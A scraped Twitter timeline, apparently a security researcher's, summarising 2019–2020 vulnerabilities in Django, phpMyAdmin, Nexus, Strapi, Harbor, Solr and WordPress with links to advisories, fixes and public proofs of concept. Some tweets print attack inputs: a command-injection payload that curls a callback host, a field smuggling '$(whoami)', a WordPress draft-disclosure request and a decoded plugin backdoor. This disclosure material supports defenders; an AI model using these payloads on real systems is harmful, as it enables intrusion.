Tweets
- Tweets, current page.
- Tweets & replies
- Media
You blocked @chybeta
Are you sure you want to view these Tweets? Viewing Tweets won't unblock @chybeta
-
CVE-2020-7471: SQLI in Django: django.contrib.postgres.aggregates.StringAgg aggregation function was subject to SQL injection, using a suitably crafted delimiter. https://djangoproject.com/weblog/2020/feb/03/security-releases/ … FIX: https://github.com/django/django/commit/eb31d845323618d688ad429479c6dda973056136 …pic.twitter.com/NljqLmin93
Thanks. Twitter will use this to make your timeline better. UndoUndo -
Thanks. Twitter will use this to make your timeline better. UndoUndo
-
CVE-2020-5504 SQLI in phpMyAdmin: A malicious user could inject custom SQL in place of their own username when creating queries to this page https://www.phpmyadmin.net/security/PMASA-2020-1/ … fix: https://github.com/phpmyadmin/phpmyadmin/commit/c86acbf3ed49f69cf38b31879886dd5eb86b6983 …pic.twitter.com/S3a3B1zHz4
Thanks. Twitter will use this to make your timeline better. UndoUndo -
find a "new" way to get JDBC Deserialization RCE and it doesn't need any interceptor .pic.twitter.com/kYEZoE4WGP
Thanks. Twitter will use this to make your timeline better. UndoUndo -
after digging deep into this commit https://github.com/phpmyadmin/phpmyadmin/commit/ff541af95d7155d8dd326f331b5e248fea8e7111 … you will find it's actually a XSS... more details: https://xz.aliyun.com/t/6960 related issue: https://github.com/phpmyadmin/phpmyadmin/issues/15651 … https://twitter.com/chybeta/status/1198515278746800128 …pic.twitter.com/fIdikBOHbo
Thanks. Twitter will use this to make your timeline better. UndoUndo -
CVE-2019-10758 post-auth Remote Code Execution in mongo-express < 0.54.0 via endpoints that uses the `toBSON` method however there are lots of no-auth mongo-express ... shodan: https://www.shodan.io/search?query=Mongo+Express … poc: https://github.com/masahiro331/CVE-2019-10758 …pic.twitter.com/zp7EK2cmu3
Thanks. Twitter will use this to make your timeline better. UndoUndo -
Apereo Cas 4.2.X Remote Code Execution.(execution =xxx_ZXlKaGJH...):GIF
and about the Apereo Cas 4.1.X Remote Code Execution.(execution =xxx_AAAAIg...):
https://twitter.com/pyn3rd/status/1001758511624212480 …
Thanks @pyn3rdpic.twitter.com/7HmCFT5wcTThanks. Twitter will use this to make your timeline better. UndoUndo -
attack unauth scrapyd by deploying evil egg。 author:
@phithon_xg https://www.leavesongs.com/PENETRATION/attack-scrapy.html … https://github.com/vulhub/vulhub/blob/master/scrapy/scrapyd-unacc/README.md …pic.twitter.com/uOewwNEJ5w
Thanks. Twitter will use this to make your timeline better. UndoUndo -
CVE-2019-15588 OS Command Injection in Nexus Repository Manager 2.x(bypass CVE-2019-5475) "createrepo" / "mergerepo" => /bin/bash -c curl${IFS}http://192.168.88.1:8000/ || /createrepo CVE-2019-15588 https://hackerone.com/reports/688270 CVE-2019-5475 https://hackerone.com/reports/654888 https://twitter.com/700_isnuoT/status/1203979987449237506 …pic.twitter.com/obBu2yRv44
Thanks. Twitter will use this to make your timeline better. UndoUndo -
CVE-2019-19609 Strapi Framework Post-Auth RCE curl -H $'Authorization: Bearer [jwt]' ... --data {"plugin": "documentation && $(whoami > /tmp/whoami)","port":"1337"} https://bittherapy.net/post/strapi-framework-remote-code-execution/ …pic.twitter.com/Xy0RL8l3kS
Thanks. Twitter will use this to make your timeline better. UndoUndo -
CVE-2019-3990 User Enumeration Vulnerability GET /api/users/search?email=
@test.com => {"code":400,"message":"username is required"} GET /api/users/search?username=t => User Enumeration https://github.com/goharbor/harbor/security/advisories/GHSA-6qj9-33j4-rvhg … https://twitter.com/chybeta/status/1202027101957701632 …pic.twitter.com/aLRMzmppGt
Thanks. Twitter will use this to make your timeline better. UndoUndo -
Harbor Security Update: 1. Privilege Escalation 2. CVE-2019-19029 SQL Injection via user-groups 3. CVE-2019-19026 SQL Injection via project quotas 4. CVE-2019-19025 Missing CSRF protection 5. CVE-2019-3990 User Enumeration Vulnerability https://github.com/goharbor/harbor/security/advisories …pic.twitter.com/jPZcUK9wvv
Thanks. Twitter will use this to make your timeline better. UndoUndo -
CVE-2019-5096 GoAhead web server code execution vulnerability : An exploitable code execution vulnerability exists in the processing of multi-part/form-data requests within the base GoAhead web server application in versions v5.0.1, v.4.1.1 and v3.6.5. https://talosintelligence.com/vulnerability_reports/TALOS-2019-0888 …
Thanks. Twitter will use this to make your timeline better. UndoUndo -
CVE-2019-19118: Privilege escalation in the Django admin. https://www.djangoproject.com/weblog/2019/dec/02/security-releases/ …pic.twitter.com/wcqweZHCoW
Thanks. Twitter will use this to make your timeline better. UndoUndo -
CVE-2019-19268 rConfig 3.9.2 Local Privilege Escalation: https://github.com/TheCyberGeek/CVE-2019-19268 … CVE-2019-19268 + CVE-2019-16663 / CVE-2019-16662 = Full ROOT ACCESS about CVE-2019-16663 / CVE-2019-16662 https://shells.systems/rconfig-v3-9-2-authenticated-and-unauthenticated-rce-cve-2019-16663-and-cve-2019-16662/ …pic.twitter.com/3OQy1PRzk2
Thanks. Twitter will use this to make your timeline better. UndoUndo -
CVE-2019-18622 SQLI in phpMyAdmin: A vulnerability was reported where a specially crafted database name can be used to trigger an SQL injection attack through the designer feature.https://www.phpmyadmin.net/security/PMASA-2019-5/ …
Thanks. Twitter will use this to make your timeline better. UndoUndo -
CVE-2019-12409: Apache Solr RCE vulnerability due to bad config default (JMX ) https://lucene.apache.org/solr/news.html jython http://mjet.py xxx 18983 command super_secret "ls -la" https://mogwailabs.de/blog/2019/04/attacking-rmi-based-jmx-services/ …pic.twitter.com/3uYrsOanEQ
Thanks. Twitter will use this to make your timeline better. UndoUndo -
backdoor in fake super socialat plugin(/wp-content/plugins/super-socialat/super_socialat.php) base64_decode("c3lzdGVtKCJ3aG9hbWkiKTs=") => system("whoami");pic.twitter.com/wpVXupCjKd
Thanks. Twitter will use this to make your timeline better. UndoUndo -
Henry Chen Retweeted
I get asked how I manage a full time job, content, steam, hacking on top of my personal life. I’m going to answer this once and only once: if you have time to waste on YouTube/Reddit you have time to learn how to hack. I go to bed an hour later and wake up an hour earlier
Show this threadThanks. Twitter will use this to make your timeline better. UndoUndo -
WordPress <= 5.2.3 - Unauthenticated View Private/Draft Posts POC: GET /wordpress/?static=1&order=asc Fix: Remove the static query property https://github.com/WordPress/WordPress/commit/f82ed753cf00329a5e41f2cb6dc521085136f308 … Analsyis: https://0day.work/proof-of-concept-for-wordpress-5-2-3-viewing-unauthenticated-posts/ …pic.twitter.com/sJlhP9t3Do
Thanks. Twitter will use this to make your timeline better. UndoUndo
Loading seems to be taking a while.
Twitter may be over capacity or experiencing a momentary hiccup. Try again or visit Twitter Status for more information.